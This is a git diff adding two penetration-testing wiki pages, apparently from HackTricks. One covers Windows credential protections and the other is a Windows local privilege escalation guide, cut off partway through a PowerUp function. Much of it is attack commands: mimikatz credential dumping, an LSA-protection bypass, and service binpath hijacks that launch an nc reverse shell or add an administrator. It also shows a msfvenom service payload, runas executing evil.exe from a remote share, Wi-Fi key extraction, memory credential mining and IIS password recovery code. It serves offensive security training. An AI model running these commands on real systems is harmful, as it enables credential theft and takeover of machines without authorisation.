+++ b/windows/stealing-credentials/credentials-protections.md
@@ -0,0 +1,104 @@
+# Credentials Protections
+
+## WDigest
+
+[WDigest](https://technet.microsoft.com/pt-pt/library/cc778868%28v=ws.10%29.aspx?f=255&MSPPError=-2147217396) protocol was introduced in Windows XP and was designed to be used with HTTP Protocol for authentication. Microsoft has this protocol **enabled by default in multiple versions of Windows** \(Windows XP — Windows 8.0 and Windows Server 2003 — Windows Server 2012\) which means that **plain-text passwords are stored in the LSASS** \(Local Security Authority Subsystem Service\). **Mimikatz** can interact with the LSASS allowing an attacker to **retrieve these credentials** through the following command:
+
+```text
+sekurlsa::wdigest
+```
+
+This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential**_ and _**Negotiate**_  in _**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.  
+If these registry keys **don't exist** or the value is **"0"**, then WDigest will be **deactivated**.
+
+## LSA Protection
+
+Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent** untrusted processes from being able to **read its memory** or to inject code. This will prevent regular `mimikatz.exe sekurlsa:logonpasswords` for working properly.  
+To **activate this protection** you need to set the value _**RunAsPPL**_ in _**HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_ to 1.
+
+### Bypass
+
+It is possible to bypass this protection using Mimikatz driver mimidrv.sys:
+
+![](../../.gitbook/assets/mimidrv.png)
+
+## Credential Guard
+
+**Credential Guard** is a new feature in Windows 10 \(Enterprise and Education edition\) that helps to protect your credentials on a machine from threats such as pass the hash. This works through a technology called Virtual Secure Mode \(VSM\) which utilizes virtualization extensions of the CPU \(but is not an actual virtual machine\) to provide **protection to areas of memory** \(you may hear this referred to as Virtualization Based Security or VBS\). VSM creates a separate "bubble" for key **processes** that are **isolated** from the regular **operating system** processes, even the kernel and **only specific trusted processes may communicate to the processes** \(known as **trustlets**\) in VSM. This means a process in the main OS cannot read the memory from VSM, even kernel processes. The **Local Security Authority \(LSA\) is one of the trustlets** in VSM in addition to the standard **LSASS** process that still runs in the main OS to ensure support with existing processes but is really just acting as a proxy or stub to communicate with the version in VSM ensuring actual credentials run on the version in VSM and are therefore protected from attack. Credential Guard must be turned on and deployed in your organization as it is **not enabled by default.**  
+From [https://www.itprotoday.com/windows-10/what-credential-guard](https://www.itprotoday.com/windows-10/what-credential-guard)  
+More information and a PS1 script to enable Credential Guard [can be found here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
+
+In this case **Mimikatz cannot do much to bypass** this and extract the hashes from LSASS. But you could always add your **custom SSP** and **capture the credentials** when a user tries to login in **clear-text**.  
+More information about ****[**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
+
+Credentials Guard could be **enable in different ways**. To check if it was enabled using the registry you could check the value of the key _**LsaCfgFlags**_ in _**HKLM\System\CurrentControlSet\Control\LSA**_. If the value is **"1"** the it is active with UEFI lock, if **"2"** is active without lock and if **"0"** it's not enabled.  
+This is **not enough to enable Credentials Guard** \(but it's a strong indicator\).  
+More information and a PS1 script to enable Credential Guard [can be found here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
+
+## RDP RestrictedAdmin Mode
+
+With Windows 8.1 and Windows Server 2012 R2, new security features were introduced. One of those security features is the _Restricted Admin mode for RDP_. This new security feature is introduced to mitigate the risk of [pass the hash](https://blog.ahasayen.com/pass-the-hash/) attacks.
+
+When you connect to a remote computer using RDP, your credentials are stored on the remote computer that you RDP into. Usually you are using a powerful account to connect to remote servers, and having your credentials stored on all these computers is a security threat indeed.
+
+Using _Restricted Admin mode for RDP_, when you connect to a remote computer using the command, **mstsc.exe /RestrictedAdmin**, you will be authenticated to the remote computer, but **your credentials will not be stored on that remote computer**, as they would have been in the past. This means that if a malware or even a malicious user is active on that remote server, your credentials will not be available on that remote desktop server for the malware to attack.
+
+Note that as your credentials are not being saved on the RDP session if **try to access network resources** your credentials won't be used. **The machine identity will be used instead**.
+
+![](../../.gitbook/assets/ram.png)
+
+From [here](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).
+
+## Cached Credentials
+
+**Domain credentials** are used by operating system components and are **authenticated** by the **Local** **Security Authority** \(LSA\). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data. This registered security package may be the **Kerberos** protocol or **NTLM**.
+
+**Windows stores the last ten domain login credentials in the event that the domain controller goes offline**. If the domain controller goes offline, a user will **still be able to log into their computer**. This feature is mainly for laptop users that do not regularly log into their company’s domain. The number of credentials that the computer stores can be controlled by the following **registry key, or via group policy**:
+
+```text
+HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\ CURRENTVERSION\WINLOGON\CACHEDLOGONSCOUNT
+```
+
+The credentials are hidden from normal users, even administrator accounts. The **SYSTEM** user is the only user that has **privileges** to **view** these **credentials**. In order for an administrator to view these credentials in the registry they must access the registry as a SYSTEM user.  
+The Cached credentials are stored in the registry at the following registry location:
+
+```text
+HKEY_LOCAL_MACHINE\SECURITY\Cache
+```
+
+**Extracting from Mimikatz**: `lsadump::cache`  
+From [here](http://juggernaut.wikidot.com/cached-credentials).
+
+## Protected Users
+
+When the signed in user is a member of the Protected Users group the following protections are applied:
+
+* Credential delegation \(CredSSP\) will not cache the user's plain text credentials even when the **Allow delegating default credentials** Group Policy setting is enabled.
+* Beginning with Windows 8.1 and Windows Server 2012 R2, Windows Digest will not cache the user's plain text credentials even when Windows Digest is enabled.
+* **NTLM** will **not cache** the user's **plain text credentials** or NT **one-way function** \(NTOWF\).
+* **Kerberos** will **no** longer create **DES** or **RC4 keys**. Also it will **not cache the user's plain text** credentials or long-term keys after the initial TGT is acquired.
+* A **cached verifier is not created at sign-in or unlock**, so offline sign-in is no longer supported.
+
+After the user account is added to the Protected Users group, protection will begin when the user signs in to the device. **From** [**here**](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group)**.**
+
+| Windows Server 2003 RTM | Windows Server 2003 SP1+ | Windows Server 2012, Windows Server 2008 R2, Windows Server 2008 | Windows Server 2016 |
+| :--- | :--- | :--- | :--- |
+| Account Operators | Account Operators | Account Operators | Account Operators |
+| Administrator | Administrator | Administrator | Administrator |
+| Administrators | Administrators | Administrators | Administrators |
+| Backup Operators | Backup Operators | Backup Operators | Backup Operators |
+| Cert Publishers |  |  |  |
+| Domain Admins | Domain Admins | Domain Admins | Domain Admins |
+| Domain Controllers | Domain Controllers | Domain Controllers | Domain Controllers |
+| Enterprise Admins | Enterprise Admins | Enterprise Admins | Enterprise Admins |
+|  |  |  | Enterprise Key Admins |
+|  |  |  | Key Admins |
+| Krbtgt | Krbtgt | Krbtgt | Krbtgt |
+| Print Operators | Print Operators | Print Operators | Print Operators |
+|  |  | Read-only Domain Controllers | Read-only Domain Controllers |
+| Replicator | Replicator | Replicator | Replicator |
+| Schema Admins | Schema Admins | Schema Admins | Schema Admins |
+| Server Operators | Server Operators | Server Operators | Server Operators |
+
+**Table from** [**here**](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)**.**
+
diff --git a/windows/windows-local-privilege-escalation/README.md b/windows/windows-local-privilege-escalation/README.md
new file mode 100644
index 00000000..bf6c5408
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/README.md
@@ -0,0 +1,1039 @@
+# Windows Local Privilege Escalation
+
+### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)\*\*\*\*
+
+If you want to **know** about my **latest modifications**/**additions**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## Windows version exploits
+
+Check if the Windows version has any known vulnerability \(check also the patches applied\).
+
+```bash
+systeminfo
+systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
+wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
+```
+
+```bash
+[System.Environment]::OSVersion.Version #Current OS version
+Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
+Get-Hotfix -description "Security update" #List only "Security Update" patches
+```
+
+_post/windows/gather/enum\_patches  
+post/multi/recon/local\_exploit\_suggester_  
+[_watson_](https://github.com/rasta-mouse/Watson)  
+__[_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _\(Winpeas has watson embedded\)_
+
+[Windows known vulnerabilities PoCs.](https://github.com/nomi-sec/PoC-in-GitHub)
+
+### Vulnerable Drivers
+
+Look for possible third party weird/vulnerable drivers
+
+```text
+driverquery
+```
+
+## Enumeration
+
+### Environment
+
+Any credential/Juicy info saved in the env variables?
+
+```text
+set
+dir env:
+```
+
+### LAPS
+
+**LAPS** allows you to **manage the local Administrator password** \(which is **randomised**, unique, and **changed regularly**\) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES.
+
+```bash
+reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
+```
+
+When using LAPS, 2 new attributes appear in the computer objects of the domain: _ms-msc-AdmPwd_ and _ms-mcs-AdmPwdExpirationTime._ These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes...
+
+### Audit Settings
+
+These settings decide what is being **logged**, so you should pay attention
+
+```text
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+```
+
+### WEF
+
+Windows Event Forwarding, is interesting to know where are the logs sent
+
+```bash
+reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
+```
+
+### AV
+
+Check is there is any anti virus running:
+
+```bash
+WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 
+```
+
+## Users & Groups
+
+You should check if any of the groups where you belong have interesting permissions
+
+```bash
+# CMD
+net users %username% #Me
+net users #All local users
+net localgroup #Groups
+net localgroup Administrators #Who is inside Administrators group
+whoami /all #Check the privileges
+
+# PS
+Get-WmiObject -Class Win32_UserAccount
+```
+
+### Get the content of the clipboard
+
+```bash
+powershell -command "Get-Clipboard"
+```
+
+## Token manipulation
+
+**Learn more** about what is a **token** in this page: [Windows Tokens](../credentials.md#access-tokens).  
+Take a look to **available privileges**, some of them can give you SYSTEM privileges. Take a look to [this amazing paper](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt).
+
+### SeImpersonatePrivilege \(3.1.1\)
+
+Any process holding this privilege can **impersonate** \(but not create\) any **token** for which it is able to gethandle. You can get a **privileged token** from a **Windows service** \(DCOM\) making it perform an **NTLM authentication** against the exploit, then execute a process as **SYSTEM**. Exploit it with [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM ](https://github.com/antonioCoco/RogueWinRM)\(needs winrm enabled\), [SweetPotato](https://github.com/CCob/SweetPotato), [PrintSpoofer](https://github.com/itm4n/PrintSpoofer).
+
+### SeAssignPrimaryPrivilege \(3.1.2\)
+
+It is very similar to **SeImpersonatePrivilege**, it will use the **same method** to get a privileged token.  
+Then, this privilege allows **to assign a primary token** to a new/suspended process. With the privileged impersonation token you can derivate a primary token \(DuplicateTokenEx\).  
+With the token, you can create a **new process** with 'CreateProcessAsUser' or create a process suspended and **set the token** \(in general, you cannot modify the primary token of a running process\).
+
+### SeTcbPrivilege \(3.1.3\)
+
+If you have enabled this token you can use **KERB\_S4U\_LOGON** to get an **impersonation token** for any other user without knowing the credentials, **add an arbitrary group** \(admins\) to the token, set the **integrity level** of the token to "**medium**", and assign this token to the **current thread** \(SetThreadToken\).
+
+### SeBackupPrivilege \(3.1.4\)
+
+This privilege causes the system to **grant all read access** control to any file \(only read\).  
+Use it to **read the password hashes of local Administrator** accounts from the registry and then use "**psexec**" or "**wmicexec**" with the hash \(PTH\).  
+ This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.  
+You can **abuse this privilege** with: [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) or with [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug)
+
+### SeRestorePrivilege \(3.1.5\)
+
+**Write access** control to any file on the system, regardless of the files ACL.  
+You can **modify services**, DLL Hijacking, set **debugger** \(Image File Execution Options\)… A lot of options to escalate.
+
+### SeCreateTokenPrivilege \(3.1.6\)
+
+This token **can be used** as EoP method **only** if the user **can impersonate** tokens \(even without SeImpersonatePrivilege\).  
+ In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.  
+ In this case, the user could **create an impersonation token** and add to it a privileged group SID.
+
+### SeLoadDriverPrivilege \(3.1.7\)
+
+**Load and unload device drivers.**  
+You need to create an entry in the registry with values for ImagePath and Type.  
+As you don't have access to write to HKLM, you have to **use HKCU**. But HKCU doesn't mean anything for the kernel, the way to guide the kernel here and use the expected path for a driver config is to use the path: "\Registry\User\S-1-5-21-582075628-3447520101-2530640108-1003\System\CurrentControlSet\Services\DriverName" \(the ID is the **RID** of the current user\).  
+ So, you have to **create all that path inside HKCU and set the ImagePath** \(path to the binary that is going to be executed\) **and Type** \(SERVICE\_KERNEL\_DRIVER 0x00000001\).  
+[**Learn how to exploit it here.**](../active-directory-methodology/privileged-accounts-and-token-privileges.md#seloaddriverprivilege)\*\*\*\*
+
+### SeTakeOwnershipPrivilege \(3.1.8\)
+
+This privilege is very similar to **SeRestorePrivilege**.  
+It allows a process to “**take ownership of an object** without being granted discretionary access” by granting the WRITE\_OWNER access right.  
+First, you have to **take ownership of the registry key** that you are going to write on and **modify the DACL** so you can write on it.
+
+### SeDebugPrivilege \(3.1.9\)
+
+It allows the holder to **debug another process**, this includes reading and **writing** to that **process' memory.**  
+There are a lot of various **memory injection** strategies that can be used with this privilege that evade a majority of AV/HIPS solutions.
+
+### Check privileges
+
+```text
+whoami /priv
+```
+
+## Network
+
+Check for **restricted services** from the outside
+
+```bash
+netstat -ano #Opened ports?
+```
+
+More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network)
+
+## Software
+
+Check all the installed software, maybe you can overwrite some binary or perform some DLL Hijacking by creating a DLL in the same folder.
+
+```bash
+dir /a "C:\Program Files"
+dir /a "C:\Program Files (x86)"
+reg query HKEY_LOCAL_MACHINE\SOFTWARE
+
+Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
+Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
+```
+
+### Run at startup
+
+Check if you can overwrite some binary that is going to be executed by other user.
+
+```bash
+wmic startup get caption,command 2>nul & ^
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
+dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul & ^
+dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul & ^
+dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul & ^
+dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
+schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
+```
+
+```bash
+Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
+Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
+Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
+Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
+Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
+Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
+Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
+```
+
+Check which files are executed when the computer is started. Components that are executed when a user logins can be exploited to execute malicious code when the administrator logins.  
+For a **more comprehensive list of auto-executed** file you could use [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)from systinternals:
+
+```text
+autorunsc.exe -m -nobanner -a * -ct /accepteula
+```
+
+## Running processes
+
+Check if you can overwrite some binary running or if you can dump the memory of any process containing passwords.
+
+```bash
+Tasklist /SVC #List processes running and services
+
+#With allowed Usernames
+Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
+
+#Without usernames
+Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
+```
+
+#### Checking permissions of the processes binaries
+
+```bash
+for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
+	for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
+		icacls "%%z" 
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
+	)
+)
+```
+
+#### Checking permissions of the folders of the processes binaries \(dll injection\)
+
+```bash
+for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v 
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
+	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users 
todos %username%" && echo.
+)
+```
+
+### Memory Password mining
+
+You can create a memory dump of a running process using **procdump** from sysinternals. Services like FTP have the credentials in clear text in memory, try to dump the memory and read the credentials.
+
+```text
+procdump.exe -accepteula -ma <proc_name_tasklist>
+```
+
+{% file src="../../.gitbook/assets/ctx\_wsuspect\_white\_paper \(1\).pdf" %}
+
+## Services
+
+Get a list of services:
+
+```text
+net start
+wmic service list brief
+sc query
+```
+
+### Permissions
+
+You can use **sc** to get information of a service
+
+```text
+sc qc <service_name>
+```
+
+It is recommended to have the binary **accesschk** from _Sysinternals_ to check the required privilege level for each service.
+
+```bash
+accesschk.exe -ucqv <Service_Name> #Check rights for different groups
+```
+
+It is recommended to check if "Authenticated Users" can modify any service:
+
+```bash
+accesschk.exe -uwcqv "Authenticated Users" * /accepteula
+accesschk.exe -uwcqv %USERNAME% * /accepteula
+accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
+accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
+```
+
+[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe)
+
+### Enable service
+
+If you are having this error \(for example with SSDPSRV\): 
+
+_System error 1058 has occurred.  
+The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
+
+You can enable it using
+
+```bash
+sc config SSDPSRV start= demand
+sc config SSDPSRV obj= ".\LocalSystem" password= ""
+```
+
+**Take into account that the service upnphost depends on SSDPSRV to work \(for XP SP1\)**
+
+### **Modify service binary path**
+
+If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
+
+```bash
+sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
+sc config <Service_Name> binpath= "net localgroup administrators username /add"
+
+sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
+```
+
+### Restart service
+
+```text
+wmic service NAMEOFSERVICE call startservice
+net stop [service name] && net start [service name]
+```
+
+Other Permissions can be used to escalate privileges:  
+**SERVICE\_CHANGE\_CONFIG** Can reconfigure the service binary  
+**WRITE\_DAC:** Can reconfigure permissions, leading to SERVICE\_CHANGE\_CONFIG  
+**WRITE\_OWNER:** Can become owner, reconfigure permissions  
+**GENERIC\_WRITE:** Inherits SERVICE\_CHANGE\_CONFIG  
+**GENERIC\_ALL:** Inherits SERVICE\_CHANGE\_CONFIG
+
+**To detect and exploit** this vulnerability you can use _exploit/windows/local/service\_permissions_
+
+### Services binaries weak permissions
+
+Check if you can modify the binary that is executed by a service.
+
+You can get every binary that is executed by a service using **wmic** \(not in system32\) and check your permissions using **icacls**:
+
+```bash
+for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
+
+for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
+```
+
+You can also use **sc** and **icacls**:
+
+```bash
+sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
+FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
+FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
+```
+
+### Services registry permissions
+
+You should check if you can modify any service registry.  
+You can **check** your **permissions** over a service **registry** doing:
+
+```bash
+reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
+
+#Try to write every service with its current content (to check if you have write permissions)
+for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
+
+get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
+```
+
+Check if **Authenticated Users** or **NT AUTHORITY\INTERACTIVE** have FullControl. In that case you can change the binary that is going to be executed by the service.
+
+To change the Path of the binary executed:
+
+```bash
+reg add HKLM\SYSTEM\CurrentControlSet\srevices\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
+```
+
+### Unquoted Service Paths
+
+If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
+
+For example, for the path _C:\Program Files\Some Folder\Service.exe_ Windows will try to execute:
+
+```text
+C:\Program.exe 
+C:\Program Files\Some.exe 
+C:\Program Files\Some Folder\Service.exe
+```
+
+To list all unquoted service paths \(minus built-in Windows services\)
+
+```bash
+wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services
+
+#Other way
+for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
+	for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
+		echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
+	)
+)
+```
+
+```bash
+gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
+```
+
+**You can detect and exploit** this vulnerability with metasploit: _exploit/windows/local/trusted\_service\_path_  
+
+
+You can manually create a service binary with metasploit:
+
+```bash
+msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
+```
+
+## DLL Hijacking
+
+Programs usually can't function by themselves, they have a lot of resources they need to hook into \(mostly DLL's but also proprietary files\). If a **program or service loads a file from a directory we have write access to**, we can abuse that to **pop a shell with the privileges the program runs with**.
+
+**In order to learn more about how to** [**discover and exploit Dll Hijacking vulnerabilities read this**](dll-hijacking.md)**.**
+
+## Credentials
+
+### [MSF-Credentials Plugin](https://github.com/carlospolop/MSF-Credentials)
+
+I have created this plugin to **automatically execute every metasploit POST module that searches for credentials** inside the victim.
+
+### Credentials manager / Windows vault
+
+From [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)  
+The Windows Vault stores user credentials for servers, websites and other programs that **Windows** can **log in the users automaticall**y. At first instance, this might look like now users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
+
+Windows Vault stores credentials that Windows can log in the users automatically, which means that any **Windows application that needs credentials to access a resource** \(server or a website\) **can make use of this Credential Manager** & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
+
+Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow **communicate with the credential manager and request the credentials for that resource** from the default storage vault.
+
+```bash
+cmdkey /list #List credential
+runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
+```
+
+Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1).
+
+### DPAPI
+
+In theory, the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.
+
+**DPAPI allows developers to encrypt keys using a symmetric key derived from the user's logon secrets**, or in the case of system encryption, using the system's domain authentication secrets.
+
+ The DPAPI keys used for encrypting the user's RSA keys are stored under `%APPDATA%\Microsoft\Protect\{SID}` directory, where {SID} is the [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier) of that user. **The DPAPI key is stored in the same file as the master key that protects the users private keys**. It usually is 64 bytes of random data. \(Notice that this directory is protected so you cannot list it using`dir` from the cmd, but you can list it from PS\).
+
+```text
+Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
+Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\
+```
+
+You can use **mimikatz module** `dpapi::masterkey` with the appropiate arguments \(`/pvk` or `/rpc`\) to decrypt it.
+
+The **credentials files protected by the master password** are usually located in:
+
+```text
+dir C:\Users\username\AppData\Local\Microsoft\Credentials\
+dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
+Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
+Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
+```
+
+You can use **mimikatz module** `dpapi::cred` with the appropiate `/masterkey` to decrypt.  
+You can **extract many DPAPI** **masterkeys** from **memory** with the `sekurlsa::dpapi` module \(if you are root\).
+
+### Wifi
+
+```bash
+#List saved Wifi using
+netsh wlan show profile
+#To get the clear-text password use
+netsh wlan show profile <SSID> key=clear
+```
+
+### AppCmd.exe
+
+**AppCmd.exe** is located in the `%systemroot%\system32\inetsrv\` directory.  
+If this file exists then it is possible that some **credentials** have been configured and can be **recovered**.
+
+This code was extracted from _**PowerUP**_:
+
+```bash
+function Get-ApplicationHost {
+    $OrigError = $ErrorActionPreference
+    $ErrorActionPreference = "SilentlyContinue"
+
+    # Check if appcmd.exe exists
+    if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
+        # Create data table to house results
+        $DataTable = New-Object System.Data.DataTable
+
+        # Create and name columns in the data table
+        $Null = $DataTable.Columns.Add("user")
+        $Null = $DataTable.Columns.Add("pass")
+        $Null = $DataTable.Columns.Add("type")
+        $Null = $DataTable.Columns.Add("vdir")
+        $Null = $DataTable.Columns.Add("apppool")
+
+        # Get list of application pools
+        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
+
+            # Get application pool name
+            $PoolName = $_
+
+            # Get username
+            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
+            $PoolUser = Invoke-Expression $PoolUserCmd
+
+            # Get password
+            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
+            $PoolPassword = Invoke-Expression $PoolPasswordCmd
+
+            # Check if credentials exists
+            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
+                # Add credentials to database
+                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
+            }
+        }
+
+        # Get list of virtual directories
+        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
+
+            # Get Virtual Directory Name
+            $VdirName = $_
+
+            # Get username
+            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
+            $VdirUser = Invoke-Expression $VdirUserCmd
+
+            # Get password
+            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
+            $VdirPassword = Invoke-Expression $VdirPasswordCmd
+
+            # Check if credentials exists
+            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
+                # Add credentials to database
+                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
+            }
+        }
+
+        # Check if any passwords were found
